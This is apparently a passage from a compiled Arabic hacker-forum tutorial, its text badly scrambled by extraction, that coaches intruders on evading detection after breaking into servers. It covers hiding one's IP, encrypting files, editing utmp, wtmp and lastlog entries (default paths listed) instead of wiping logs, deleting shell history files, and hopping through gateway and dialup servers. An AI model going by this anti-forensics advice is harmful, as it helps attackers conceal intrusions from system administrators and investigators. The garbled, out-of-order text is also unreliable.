ﺘﺠﺎﻧﻮس ﻋﻠﻰ دوﻟﻪﺘﻌﻘﺐ ﻣﻦ وراﺋﻬﺎﻫﺎ.ﻓﻔﻲﻛ ﻞﺛﺎﻧﯿﻪ ﯾﻨﺴﺒﻚ ﺳﺘ ﺮك وراﺋﻚ ﻣﻌﻠﻮﻣﺎ تأو ﺧﻄﻮا ت ﯾﻤﻜﻦأنﺗ
ﻻﺗ
٤٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻢأ ﺧﻔﺎﺋﻚﺑﻜ ﻞ
ﻣﺒﻬﻤﻪ ﻏﯿ ﺮ ﺣﻘﯿﻘﻪ ﻣﺜﻼ )ﻓ ﺮﻧﺴﺎ ،ﻛﻮﺑﺎ،اﻟﻌ ﺮا ق ،ﻟﺒﻨﺎن ،ﻣﺼ ﺮ ،ﺎﻓ ﺮﯾﻘﺎاﻟﺠﻨﻮﺑﯿﻪ ( وﻫﻜﺬاﻟﻜﻲ ﯾ
ﺘﻚاﻟﺨﺎﺻﻪ ﺘﺠﺴ ﺲاﻟﻤﺨﺰﻧﻪﻓﻲ ﺣﺎﺳﺒ ﺘﯿﺠﺎﻧﻮس ﺣﺬ ف ﺧﻄﻮا تاﻟ ﺳﻬﻮﻟﻪ وﺑﺴﺎ ﻃﻪ .وﻛﺬﻟﻚ ﻣﻦ ﻣﯿﺰا ت ﺳ
ﺘﺸﻐﯿ ﻞ ) ﺎﻟﻮﯾﻨﺪوز ( .وأﻣﻮرأ ﺧ ﺮى ﯾﺠﺪرﺑﻨﺎاﻻﺷﺎرهاﻟﻰﺑﻌ ﻀﻬﺎ : ﺘ ﺮﻧ ﺖأو ﻧﻈﺎماﻟﺘﺼﻔﺢاﻷﻧ ﺑ
ﺘﻚ.
ﻗﻢ ﺎﻷﯾﺒﻲاﻟ ﺤﻘﯿﻘﻲاﻟﺨﺎ صﺑﻚﻟﻜﻲ ﻻﯾﻤﻜﻦﻛﺸﻔﻚ وﻣﻌ ﺮﻓﻪﻫﻮﯾ
-ﺗﻨﻜﯿ ﺮ وﺗﻐﯿﯿ ﺮ ر
ﺘﺸﻐﯿ ﻞ.
ﺘ ﺮﻧ ﺖ و ﺧﻄﻮا ت ﻧﻈﺎماﻟ
ﺘﺠﺴ ﺲ ﺎﻟﻨﺎﺗﺠﻪ ﻣﻦﺗﺼﻔﺢاﻷﻧ -ﻣﺴﺢ ﺧﻄﻮا تاﻟ
ﺘﺪﯾﺎ تﺑﻮاﺑﺔاﻟﻌ ﺮب ﻮﻏﯿ ﺮﻫﺎ ﻣﻦاﻟﻤﺰاﯾﺎﺗﺠﺪوﻧﻬﺎﻓﻲ ﺎﻟﺸ ﺮ حﻓﻲ ﻣﻨ
http://www .arabsgate.com/vb/showthread.php?threadid=215946
...
٤٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐDJ KING :
$$$$$$$$$$$$$
ﻫﺬااﻟﻤﻮ ﺿﻮ ع ﺳﯿﺠﻌﻠﻚﺗﺨﺎ ف ﻣﻦ ﺧﯿﺎﻟﻚ وﺗﻌﻤ ﻞاﻟ ﻒ ﺣﺴﺎبﻟﻈﻠﻚ ..ﻟﻜﻦاﻧﺸﺎﻟﻪ ﺳﯿﻜﻮن دﻓﻌﻪﻟﻼﻣﺎم وﻟﯿ ﺲ
ﺘ ﺮاﺟﻊﻻنﺗﺨﺎ ف وﺗ
ﺘﺒﻮاﺘﺠﻨﺒﻪ داﺋﻤﺎ ..ﺑﻤﻌﻨﻰا ﺧ ﺮ ..ﻛ ﻞ ﻣﻦا ﺧﻮاﻧﻨﺎ واﺳﺎﺗﺬﺗﻨﺎ ﻣﻦﻛ ﺎﺳﻠﻮباﻟﻤﻮ ﺿﻮ ع ﻏ ﺮﯾﺐ ..و ﻋﺎدة ﻣﺎ ﻧ
ﻗﻊﻛﺎن ﻫﻤﻬﻢاﻟﻮ ﺣﯿﺪﻓﻲاﻟ ﺤﻤﺎﯾﻪ ﻫﻮ ﻣﺴﺢاﻟﻠﻮ ق log ﺘ ﺮا ق ﺎﻟﺴﯿ ﺮﻓ ﺮا ت واﻟﻤﻮا دروﺳﺎ و ﺷ ﺮو ﺣﺎﻓﻲا ﺧ
ﺘﻬﺎ ء ﻣﻦ ﺘﺸﻔﻪﺑﻌﺪاﻻﻧ ﺘﻜ
ﺛ ﺮك ؟!!ﻫﺬا ﻣﺎ ﺳ ﺘﺒﻊا files ..ﻟﻜﻦ ﻫ ﻞ ﻫﺬا ﯾﺠﻌﻠﻚﻓﻲاﻣﺎنﺗﺎم ؟!ﻫ ﻞﻫﺬا ﺳﯿﻤﻨﻊﺗ
ﻗ ﺮا ءةاﻟﻤﻮ ﺿﻮ ع ..
************************
ﺘ ﺮﻓﺎ وﺎذاﻛﻨ ﺖﺗﻈﻦاناﻟ ﺤﺼﻮ ل ﻋﻠﻰﺗ ﺮﺟﻤﺔاﻟﺜﻐ ﺮا ت ) ( exploitesﺑﺎﺳ ﺮ ع ﻣﺎ ﯾﻤﻜﻦ ﻫﻮ ﻣﺎ ﯾﺠﻌﻠﻚ ﻣ ﺤ
ﻗﻮ لﻟﻚ "اﻧﻚاﻧﺴﺎن ﺧﺎ ﻃﺊ واناﺳﻠﻮبﺗﻔﻜﯿ ﺮك ﻏﻠﻂ " ﺘﻄﻮراﻓﺎﺳﻤﺢﻟﻲﺑﺎنا ﻣ
ﺘﻢاﻟﻘﺒ ﺾ ﻋﻠﯿﻚاذا ﻫﺎﺟﻤ ﺖا ﺣﺪىاﻟﺴﯿ ﺮﻓ ﺮا تاﻟﻜﺒﯿ ﺮه .. ﺘﻔﯿﺪكاﻟﺜﻐ ﺮه ﺎﻟ ﺤﺪﯾﺜﻪ ﺟﺪا ) day ) ٠ﻋﻨﺪﻣﺎ ﯾ ﻣﺎذا ﺳ
ﺘﻚ !؟! ﻗﺒﺘﻢاﻟﺴﯿﻄ ﺮه ﻋﻠﻰاﺟﻬﺰﺗﻚ وادواﺗﻚ و ﻣ ﺮا ؟ ﻮ ﻋﻨﺪﻫﺎ ﺳﯿ
ﺘﻘﻨﯿﺎ تاﻟﻌﺎﻟﯿﻪ !! ﯾﻤﻜﻦ ﯾ ﺮىاﻟﺒﻌ ﺾان ﻫﺬاﻟﻢﺑ ﺤﺪ ثﻗﻂ ﻻي ﺷﺨ ﺺ ﻧﻌ ﺮﻓﻪ ؟اوانﺑﻼدﻧﺎﻟﯿ ﺲﻓﯿﻬﺎ ﻫﺬهاﻟ
ﻟﻜﻦ ﻫﺬاﻗﺪ ﯾ ﺤﺪ ث ﯾﻮم ﻣﺎ !!
ﻮاﯾ ﻀﺎاﻧ ﺖ ﻻﺗﻬﺎﺟﻢﻓﻘﻂ ﺳﯿ ﺮﻓ ﺮا تﺑﻠﺪكاﻧﻤﺎ ﺳﯿ ﺮﻓ ﺮا تا ﺧ ﺮى ﻋﺎﻟﻤﯿﻪ ﻣ ﺤﻤﯿﻪ ﻣﻦﻗﺒ ﻞاﻟﺸ ﺮ ﻃﻪاﻟﺪوﻟﯿﻪ ..ﻛﻤﺎ
اﻧﻪ ﻻﺑﺪ ﻣﻦاﻟ ﺤ ﺮ ص وﻓﻬﻢاﻻﻣﻮراذاﻛﻨ ﺖﺗ ﺮﯾﺪانﺗﺴﻤﻲ ﻧﻔﺴﻚ ﻫﻜ ﺮ hackerﺑﻤﻌﻨﻰاﻟﻜﻠﻤﻪ
ﺘ ﺮا فاواﻧﻚ ﺘﻘﺪﻓﻲ ﻧﻔﺴﻚاﻧﻚاﻛﺒ ﺮ ﻣﻦﻗ ﺮا ءةﻫﺬااﻟﻤﻮ ﺿﻮ عﺑﻜﺜﯿﯿ ﺮ ﻻﻧﻚ ﻣﻦاﻟﻤﻌ ﺮوﻓﯿﻦ ﻋﻨﻬﻢﺑﺎﻻ ﺣ ﺮﺑﻤﺎﺗﻌ
ﺘﺎجﻟﻘ ﺮا ءةاﻟﻤﻮ ﺿﻮ عاﻟﻲاﻟﻨﻬﺎﯾﻪ ﺗ ﺮى ذﻟﻚﻓﻲ ﻧﻔﺴﻚ ..ﻟﻜﻦاﻧﺎاؤﻛﺪﻟﻚﺑﺎﻧﻚ ﻣﺨﻄﺊ واﻧ ﺖﺗ ﺤ
************************
ﺎﻟﻤﻮ ﺿﻮ ع ﻣﻘﺴﻢاﻟﻰ ٨اﺟﺰا ء :
=================
ﺘﻪ ﺣﺎﻟﯿﺎ (ﺘﻬﺎ ء ﻣﻦﻗ ﺮاﺋ ﻗﺪﻗﻤ ﺖاﻧ ﺖﺑﺎﻻﻧ ﺎﻟﺠﺰ ءاﻻو ل :اﻟﻤﻘﺪﻣﻪ ) وﻫﻮ ﻣﺎ
ﺘﻢ ﻋ ﺮ ﺿﻪ ﻣﻦ ﺧﻼ ل ﻫﺬه ﺎﻟﺠﺰ ءاﻟﺜﺎﻧﻲ :اﻻﻣﻮراﻟﻌﻘﻠﯿﻪ وﻛﯿ ﻒﺗﺼﺒﺢ " **" Paranoidﻫﺬا ﺎﻟﺠﺰ ء ﺳﯿ
اﻟﻤﻮا ﺿﯿﻊ :
-ﺎﻟﺪاﻓﻊاواﻟ ﺤﺎﻓﺰ
-ﻟﻤﺎذاان ﻻﺑﺪانﺗﺼﺒﺢ " " Paraniod
-ﻛﯿ ﻒ ﯾﻤﻜﻦانﺗﺼﺒﺢ " " Paranoid؟
ﺘﻚاﻟﺠﺪﯾﺪه ؟! -ﻮﻛﯿ ﻒﺗ ﺤﺎﻓﻆ ﻋﻠﻰاﺳﻠﻮﺑﻚاﻟﺠﺪﯾﺪاو ﺷﺨﺼﯿ
٤٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘ ﺮكاياﺛ ﺮ -ﻻﺗ
-ﺎﻣﻮر واﺷﯿﺎ ء ﯾﺠﺐﺗﺠﻨﺒﻬﺎ و ﺎﻟ ﺤﻈ ﺮ ﻣﻨﻬﺎ
ﺘﺎﻟﯿﻪ (
ﺘﻢ ﻋ ﺮ ﺿﻪ ﻣﻦ ﺧﻼ لاﻟﻨﻘﺎطاﻟ
ﺘﻬﺎ ) و ﺳﯿ
ﺘﻲ ﯾﺠﺐ ﻣﻼ ﺣﻈ ﺘﻘﻨﯿﺎ تاﻟ ﺤﺪﯾﺜﻪاﻟﻲ ﯾ
ﺎﻟﺠﺰ ءاﻟ ﺮاﺑﻊ :اﻟ
-ﺗﻤﻬﯿﺪ
ﺛ ﺮك ﻣﻦاي ﻧﻮ ع -ﺎﻣﻨﻊﺗﻘﻔﻰا
-ﺎﯾﺠﺎداي ﻧﻮ ع ﻣﻦاﻧﻮا ع ﻣﻠﻔﺎ تاﻟﻠﻮ ق lOGsﻣﻬﻤﺎﻛﺎنﻓﯿﻬﺎ ﻣﻦﺗﻼﻋﺐ ..
-ﺗ ﺤﻘ ﻖ ﻣﻦsyslog configuration and logfile
ﺘﻪ -ﺗ ﺤﻘ ﻖ ﻣﻦ ﻧﻮﻋﯿﺎ تﺑ ﺮاﻣ ﺞاﻻﻣﻦاﻟﻤﺜﺒ
-ﺗ ﺤﻘ ﻖ ﻣﻦ وﺟﻮداﻟﻤﺪرا ءAdmins
-ﻛﯿ ﻒ ﯾﻤﻜﻦﺗﺼ ﺤﯿﺢ checksum checking software
ﺘﺨﺪماﻻﻣﻨﯿﻪ -ﺣﯿ ﻞاﻟﻤﺴ
***************************************************************************************
اﻟﺠﺰاﻟﺜﺎﻧﻲ :
=======
-ﺎﻟﺪاﻓﻊ واﻟ ﺤﺎﻓﺰ :
*************
ﻗﻌﻲ .. ﺘﺼﺒﺢاﻧﺴﺎن وا ﺘﺪﻓﻌﻚ وﺗ ﺤﻔﺰكﻟ ﺘﻲ ﺳ ﻻﺑﺪ ﻣﻦﺗ ﺤﻜﯿﻢاﻟﻌﻘ ﻞﻟﻠﻨﺠﺎ حﻓﻲاي ﻋﻤ ﻞ ..اﻟﻌﻘ ﻞ ﻫﻮاﻟﻘﻮهاﻟ
ﻣﺴﺌﻮ ل و ﺣ ﺮﯾ ﺺ
ﺘﻮﻓ ﺮﻓﯿﻪ ﻫﺬهاﻟﻤﺒﺎدى ء و ﺎﻻﻣﻜﺎﻧﯿﺎ تاﻟﻌﻘﻠﯿﻪ ..ﻣﺜﻠﻬﺎ ﻣﺜ ﻞﺑﻨﺎ ءﺘ ﺮ ق ) ( Hackerﺎﻟﻨﺎﺟﺢ ﻻﺑﺪ وانﺗ ﺎﻟﻤﺨ
ﺘﻘﺴﻢاﻻﺑﻌﺪ ﻣﻤﺎرﺳﺔاﻟ ﺮﯾﺎ ﺿﻪاﻟﺨﺎﺻﻪﺑﺬﻟﻚ ) ﻋﻠﻰ ﺳﺒﯿ ﻞاﻟﻤﺜﺎ ل ( ﻋ ﻀﻼ تاﻟﺠﺴﻢﻟﻦ ﯾﻜﺒ ﺮاﻟﺠﺴﻢ و ﯾ
ﺘﯿﺎ ﻃﺎ ت واﻟ ﺤﺬرﻗﺒ ﻞاﻟﻘﯿﺎمﺑﺎي ﺷﺊ ﺘﻤ ﺮساوﻟﺪﯾﻚاﻟﻜﺜﯿﯿ ﺮ ﻣﻦاﻟﻤﻌﻠﻮﻣﺎ ت ﻻﺑﺪا ﺧﺬاﺷﺪاﻻ ﺣ ﻣﻬﻤﺎﻛﻨ ﺖ ﻣ
٤٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
-ﺎﻟﺠﺰ ءاﻟﺜﺎﻟﺚ:
=========
-ﺗﻤﻬﯿﺪ
******
ﺘﺮ ق
ﺘﻰﻟﻮﻛﻨ ﺖ ﻣﺨ
ﺘ ﺮا ق ..ﺣ
ﺘﯿﻌﺎﺑﻬﺎ ﺟﯿﺪاﻗﺒ ﻞ ﻣﻤﺎرﺳﺔاي ﻋﻤﻠﯿﺔا ﺧﯾﺠﺐ ﻣﻌ ﺮﻓﺔﻫﺬهاﻻﻣﻮراﻟﻘﺎدﻣﻪ واﺳ
ﺘﻮﻋﺐاﻻﻓﻜﺎر ﺎﻟﻘﺎدﻣﻪ
ﺘﻤ ﺮس ﻻﺑﺪانﺗﺴ ﻣ
٤٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺸﻔﯿ ﺮاﻟﻤﻠﻔﺎ تﺑﺸﻜ ﻞﻓ ﺮدي ) ﻣﻠ ﻒﺑﻤﻠ ﻒ (اﻟﯿﻜﻢ ﻫﺬهاﻟﺒ ﺮاﻣ ﺞ )اﻻﻛﺜ ﺮ ﺷﻬ ﺮه واﻻ ﺣﺴﻦادا ء ( :
ﻟ
٤٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻰﺑ ﺮﻣﻮزﺗﻔﻬﻤﻬﺎاﻧ ﺖ ﺘﯿﺎدي ..اﻧﻤﺎ ﯾﻤﻜﻨﻚﺑﺎنﺗﺸﻔ ﺮﻫﺎ ) ﺣ ﻗﺎم ﻫﻮاﺗ ﻒاﺻ ﺤﺎﺑﻚاﻟﻬﺎﻛ ﺮزﺑﺸﻜ ﻞاﻋ ﻻﺗ ﺤﻔﻆار
ﻓﻘﻂ ( واﺗﺼ ﻞﺑﻬﻢ ﻣﻦ ﻫﻮاﺗ ﻒاﻟﺸﺎر عاو ﻣﻦاﻟﻌﻤ ﻞ ..
ﺘﻌﻠ ﻖﺑﻬﺬهاﻻﻣﻮر !! ﺘﻌﻤ ﻖ ﺟﺪاﻓﻲاﻟﻬﺎﻛﯿﻨ ﺞﻓﻼﺑﺪ ﻣﻦﺗﺸﻔﯿ ﺮﻛ ﻞ ﺷﺊ ﯾ ﺎذااﻧ ﺖﺑﺎﻟﻔﻌ ﻞ ﻣ
ﺘﻰاذا ﺧﺴ ﺮ ت ﺘﯿﺎ ﻃﯿﻪ ﻣﻦ ﻣﻌﻠﻮﻣﺎﺗﻚ ﻋﻠﻰ CDﺎو HDﻮﺑﺎﻟﻄﺒﻊﺗﻜﻮن ﻣﺸﻔ ﺮه ﺣ ﺎ ﺣﻔﻆ داﺋﻤﺎ ﻧﺴﺨﻪا ﺣ
ﺘﯿﺎ ﻃﯿﻪاﻟﻤﻌﻠﻮﻣﺎ تاﻟﻤﻮﺟﻮده ﻋﻠﻰ ﺟﻬﺎزك ﯾﻜﻮنﻟﺪﯾﻚ ﻧﺴ ﺦا ﺣ
ﺘﺎﺟﻬﺎ ..وانﻛﺎنﻟﺪﯾﻚ document filesﺎو ﻣﻠﻔﺎ ت ﻣﻄﺒﻮﻋﻪ و ﻻﺗ ﺮﯾﺪﻫﺎ ﻣ ﺮة ﺘﻔﻆﺑﻤﻠﻔﺎ ت ﻻﺗ ﺤ ﻻﺗ ﺤ
ﺘﯿﺎدﯾﻪاوانارد ت ﻗﻬﺎﻓﻲ ﻣﻜﺎنﺑﻌﯿﺪﻛ ﻞ ﺎﻟﺒﻌﺪ ﻋﻦاﻣﺎﻛﻦﺗﻮاﺟﺪكاﻻﻋ ﺘﯿﺎدﯾﺎاﻧﻤﺎا ﺣ ﺮا ﺧ ﺮى ﻻﺗﻘﻄﻌﻬﺎاﻋ
ﺘﻬﺎ ﻣﻦ ﺟﺪﯾﺪﺑﺎﺳﻠﻮب ﻣ ﺮﻣﺰاو ﻣﺸﻔ ﺮ ﻻﯾﻌ ﺮﻓﻪاﻻاﻧ ﺖ !! ﺘﺎﺑ
ﺘﻔﺎظﺑﻬﺎﻓﻌﻠﯿﻚﻛ اﻻ ﺣ
<----
ﻣﻠﻔﺎ تاﻟﻠﻮ ق LoGS :
============
ﻫﻨﺎك ٣ﻣﻠﻔﺎ ت ﻣﻬﻤﻪ ﺟﺪا :
ﺘﺴﺠﯿ ﻞ ﻋﻨﺪاﻟﺪ ﺧﻮ ل واﻟﺨ ﺮوج ) ( log on/off - log in/logout + tty + host- WTMPﻟﻠ
٥٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻗﻊﻓﻲ ﻧﻔ ﺲ ﻫﺬا ﺎﻟﺨﻄﺎ زﻣﺎن ..ﻟﻜﻦاﺗﻌﻠﻤ ﺖ ( و ﺘﻰاﻧﺎﻛﻨ ﺖا ﺧﻄﺎ ﯾﻘﻊﻓﯿﻪاﻟﺠﻤﯿﻊﺑﻨﺴﺒﺔ % ٩٩٫٩ﻣﻨﻨﺎ ) ﺣ
ﻗﺎ ت logfiles ﻫﻮاﻧﻚﺗﻤﺴﺢاﻟﻠﻮ
ﺘ ﺮ ق ﻣﺎﻗﺪ د ﺧ ﻞ ﻋﻠﻰاﻟﻨﻈﺎم ..اﻣﺎ
ﺘﻢﺑﺎن ﯾﻌ ﺮ فاﻻدﻣﯿﻦاﻧﻪ ﻫﻨﺎك ﻣﺨ ﻋﻠﻄﻮ ل ..ﻫﺬا ﻣﺠﺪيﻓﻲ ﺣﺎﻟﺔاﻧﻚ ﻻﺗﻬ
ﺘ ﺮﻓﯿﻦ ﻋﻠﯿﻚاﻟﺪ ﺧﻮ ل واﻟﺨ ﺮوج دونان ﯾﻼ ﺣﻈﻚاي ﺷﺨ ﺺ ..دون ﺎنﺗﻘﻮم ﺘﻐ ﻞ ﺷﻐ ﻞاﻟﻤ ﺤ اذاارد تانﺗﺸ
ﺘﺒﺎه ﻣﺪﯾ ﺮاﻟﻨﻈﺎمﺘﻐﯿﯿ ﺮاي ﺷﺊ ﯾﻠﻔ ﺖاﻧ ﺑ
ﻮﻟﻌﻤ ﻞ ذﻟﻚﺗﺎﺑﻊ ﻣﻌﻲ :
ﺘﻲ روﺟ ﺖ ﻋﻠﻰاﻧﻬﺎ ﻻﺗﻘﻮمﺑﻤﺴﺢاﻟﻠﻮ قاﻧﻤﺎﺗﻘﻮمﺑ ﺤﺬ ف د ﺧﻮﻟﻚﻓﻬﻲ ﻏﯿﯿ ﺮ ﻣﺠﺪﯾﻪ ﻣﺜ ﻞ ﺘﻤﺪاﻟﺒ ﺮاﻣ ﺞاﻟ
ﻻﺗﻌ
ﺑ ﺮﻧﺎﻣ ﺞZAP (or ZAP2
ﻻﻧﻪ ﯾﻘﻮمﺑﻌﻤ ﻞا ﺻﻔﺎرﻛﺎ ﺧ ﺮﻟﻮ ق ﻣﻜﺎﻧﻚ ﺎﻧ ﺖ و ﻫﺬااﯾ ﻀﺎ دﻟﯿ ﻞ ﻋﻠﻰ وﺟﻮد ﺧﻄﺎ ﺳﯿﻼ ﺣﻈﻪ ﻣﺪﯾ ﺮاﻟﻨﻈﺎم
ﺎذا ﻋﻠﯿﻚﺑﺎﻟﻘﯿﺎمﺑﺬﻟﻚ ﯾﺪوﯾﺎ ..
ﺘﻮزﯾﻌﺎ تاﻟﻘﺪﯾﻤﻪ ﺟﺪا (ﺘﺜﻨﺎ ءﺑﻌ ﺾ ﺎﻟ
ﺘﻐﯿ ﺮ وﺗﻌﺪ لﻓﻲا ل ( log filesﺑﺎﺳ ﻋﺎدة ﻻﺑﺪانﺗﻜﻮ ت rootﻟ
ﺘﻮزﯾﻊ (
ﺘﻼ ف ﺎﻟﺘﻠ ﻒﺑﺎ ﺧﺎﻣﺎﻛﻦﺗﻮاﺟﺪ ﻣﻠﻔﺎ تاﻟﻠﻮ ق ( defaultﺗﺨ
UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log
ﻮﻓﻲﺑﻌ ﺾاﻟﻨﺴ ﺦاﻟﻘﺪﯾﻤﻪhome/.lastlog$
ﺛ ﺮا :
ﺘ ﺮكا ﻻﺗ
=======
ﻛﺜﯿﯿ ﺮ ﻣﻦ ﺎﻟﻬﺎﻛ ﺮز ﯾﻨﺠ ﺤﻮنﻓﻲ ﻋﻤﻠﯿﺔ ﺣﺬ ف د ﺧﻮﻟﻬﻢ ﻣﻦ ﻣﻠﻔﺎ تاﻟﻠﻮ ق ..ﻟﻜﻨﻬﻢ ﯾﻨﺴﻮناﻣ ﺮا ﻫﺎﻣﺎ وﻗﺎﺗﻼ !!!
ﺘﻲﺗﻮﺟﺪ ﻫﻨﺎ و ﻫﻲاﻟﻤﻠﻔﺎ تاﻟ
/tmp and $HOME
ﻮ ﺟﻮدا ل Shell Historyﻓﻲ HOME$ﻣﺼﺪرﻗﻠ ﻖﻛﺒﯿﯿ ﺮ :
History files :
sh : .sh_history
csh : .history
ksh : .sh_history
bash: .bash_history
zsh : .history
Backup Files :
~* dead.letter, *.bak,
٥١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻬﺎﺘﻲ ﯾﺠﺐ ﻣﻼ ﺣﻈ ﺘﻘﻨﯿﺎ تاﻟ ﺤﺪﯾﺜﻪاﻟﻲ ﯾﺎﻟﺠﺰ ءاﻟ ﺮاﺑﻊ :اﻟ
===============================
-ﺗﻤﻬﯿﺪ
*******
ﺘﻌﺒﺎ ﻣﺎ
ﺘﻘﻨﯿﺎ ت ﻣ
ﺘﺨﺪمﻫﺬهاﻟ ﻗﺎ ت ..ﻋﻠﯿﻚانﺗﻌ ﺮ فﻛﯿ ﻒﺗﺴ ﺘ ﺮا
ﺑﻌﺪانﺛﺒ ﺖاو ل snifferﻮ ﺧﻄﻄ ﺖﻟﺒﺪااﻻ ﺧ
ﯾﻠﻲ :
ﺛ ﺮك ﻣﻦاي ﻧﻮ ع -ﺎﻣﻨﻊﺗﻘﻔﻰا
**********************
ﻗﻊﻟﻜﻦﻫﺬا ﻻﯾﻬﻢ ... ﺘ ﺮ ق hackerﻮاﻧﻚا ﻃ ﺤ ﺖﺑﺎ ﺣﺪاﻟﻤﻮا ﻗﺪ ﯾﻼ ﺣﻆ ﺎﻻدﻣﯿﻦ ) ﻣﺪﯾ ﺮاﻟﺸﺒﻜﻪ ( وﺟﻮدكﻛﻤﺨ
ﺘﻌﺎﻣ ﻞ ﻣﻌﻚ !!!اﻟﻤﻬﻢﻫﻮاﻧﻪﻛﯿ ﻒ ﺳﯿ ﺮﺻﺪك و ﻋﻨﺪﻫﺎﻛﯿ ﻒ ﯾﻤﻜﻦان ﯾ
ﺘﺒﻌﻚ و ر ﺻﺪك واﯾ ﻀﺎﻛﯿ ﻒ ﺘﻤﺎﻻ ت واﻻﺳﺎﻟﯿﺐاﻟﺬي ﯾﻤﻜﻦﺑﻬﺎﺗ ﺘﻢﺗﻮ ﺿﯿﺢﻛ ﻞاﻻ ﺣ ﻟﺬاﻓﻔﻲ ﻫﺬااﻟﺠﺰ ء ﺳﯿ
ﯾﻤﻜﻦانﺗﻤﻨﻌﻬﺎ ...
ﺘ ﺮ ق ﻋﻠﯿﻪ
*ﻣﻦاﻟﻄﺒﯿﻌﻲ )اﻟﻌﺎدي (ان ﯾﺴﻬ ﻞ ﻋﻠﻰ ﻣﺪﯾ ﺮاﻟﺸﻜﺒﻪ ) ) adminﻣﻌ ﺮﻓﺔاﻟﻨﻈﺎماﻟﺬيﻛﺎناﻟﻤﺨ
ﺘ ﺮﻛﻬﺎﻛﻤﺎﻫﻲ (او ﻣﻦﺘﻪ و ذﻟﻚاﻣﺎ ﻋﻦ ﻃ ﺮﯾ ﻖ ﻣﻠﻔﺎ تاﻟﻠﻮ ق )ﻫﺬاانﻛﺎناﻟﻬﺎﻛ ﺮ ﻏﺒﻲﻟ
ﻋﻨﺪ د ﺧﻮﻟﻪ ﻋﻠﻰ ﺷﺒﻜ
ا ل outputﻣﻦا ل sniffer
٥٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻲ ﯾﻮﺟﺪﻟﻚ ﺣﺴﺎب * A gateway server in betweenﻫﺬا ﻮا ﺣﺪ ﻣﻦاﻟﻜﺜﯿﯿ ﺮ ﻣﻦاﻟﺴﯿ ﺮﻓ ﺮا تاﻟ
ﺘﻄﯿﻊﺗﻐﯿﯿ ﺮ ﺘﺴ ﺘﺎج ﻻنﺗﻜﻮن روو ت ﻋﻠﯿﻬﺎﻟ ﺘﺨﺪام واﻧ ﺖﺗ ﺤ ﺘﻬﻰاﻟﺴﺨﺎﻓﻪﻓﻲاﻻﺳ ﺘﺒ ﺮﻓﻲ ﻣﻨ ﺘﻲﺗﻌ ﻋﻠﯿﻬﺎ واﻟ
ا ل wtmp and lastlogs
ﺘﻢاﻟﻜﺸ ﻒ ﺘﻰ ﻻ ﯾ ﺘﻤ ﺮار ﺣﺘﺨﺪاماﻛﺜ ﺮ ﻣﻦ gateway serverﻮانﺗﺒﺪ لﺑﯿﻨﻬﻢﺑﺎﺳ ﻛﻤﺎاﻧﻪ ﻻﺑﺪان ﻣﻦاﺳ
ﻋﻨﻚ ..
ﺘﺼ ﻞﺑﺎﻟﺴﯿ ﺮﻓ ﺮاﻟﻤ ﺮاد ﺘ ﺮ ق ﻣﻨﻪ ..ﻗﻢﺑﺎﻻﺗﺼﺎ لﺑﺎ ل gateway serverﻮ ﻣﻦﺛﻢﺗ ﺘﺨﻣﻦاﻟﺸﯿ ﻞاﻟﺬي ﺳ
ﻗﻪ ..ﺘ ﺮا
اﺧ
ﺘﻐﯿﯿ ﺮاﻟﻠﻮ ق (
ﺘﺎج داﺋﻤﺎ ﻞ root accessﻟ ( >==ﺗ ﺤ
ﺘﻌﺪﯾ ﻞﻓﻲ ﻣﻠﻔﺎ ت ﺘﺨﺪاﻣﻚ ل Dialup serverﯾﺠﻨﺒﻚاﻟﻜﺜﯿﯿ ﺮ ﻣﻦ ﺎﻟﻤﺸﺎﻛ ﻞ ..ﺣﯿﺚاﻧﻚﻓﻲ ﻏﻨﻰ ﻋﻦاﻟ ﺑﺎﺳ
ﺘﻠ ﻒﻓﻲﻛ ﻞ ﻣ ﺮهﺗﺪ ﺧ ﻞﻓﯿﻬﺎ ﻋﻠﻰا ل )= hacked system ﺘ ﺮاك ﻣﺨاﻟﻠﻮ قﺑﺸ ﺮطانﺗﺪ ﺧ ﻞﺑﺎﺷ
ﺘﺨﺪم hacking ﻣﻠ ﺤﻮﻇﻪ :اذاﻛﻨ ﺖﻗﺎدر ﻋﻠﻰاﻻﺗﺼﺎ لﺑﺴ ﺮﻓﯿ ﺮا ت dialupﻛﺜﯿﯿ ﺮهﻓﻼ ﺣﺎﺟﻪ ﻻنﺗﺴ
ﺘﺼ ﻞ ﻣﻦ ﺧﻼﻟﻬﺎ ﺘﻲﺗ ﺘﻠﻔﻪاﻟﺘﻐﯿ ﺮ ﺎﻟﺸ ﺮﻛﺎ تاﻟﻤﺨﺛ ﺮكﺑ
ﺘﻐﯿ ﺮاserverﻻﻧﻪ ﺳﯿ
ﺘﻰ وانﻗﻤ ﺖﺑﻤﺎ ﺳﺒ ﻖ ( ﺘﻘﺪﻣﻪ ( ﺣﺘ ﺤﺪهاﻻﻣ ﺮﯾﻜﯿﻪ واوروﺑﺎ )اﻟﺪو لاﻟﻤ
ﺘﻮاﺟﺪﯾﻦﻓﻲاﻟﻮﻻﯾﺎ ت ﺎﻟﻤ
ﺑﺎﻟﻨﺴﺒﻪﻟﻠﻤ
) dialup serversﯾﻤﻜﻨﻬﻢﺗﺴﺠﯿ ﻞﻛ ﻞاﺗﺼﺎ لﺗﻢ وﻟﺪﯾﻬﻢارﺷﯿﻔﺎ ت ﻣﻨﺬ ﺳﻨﯿﯿﻦ ﻫﺬا ﻋﺪدﻫﺎ !
ﺘﺎﻟﯿﻪ :
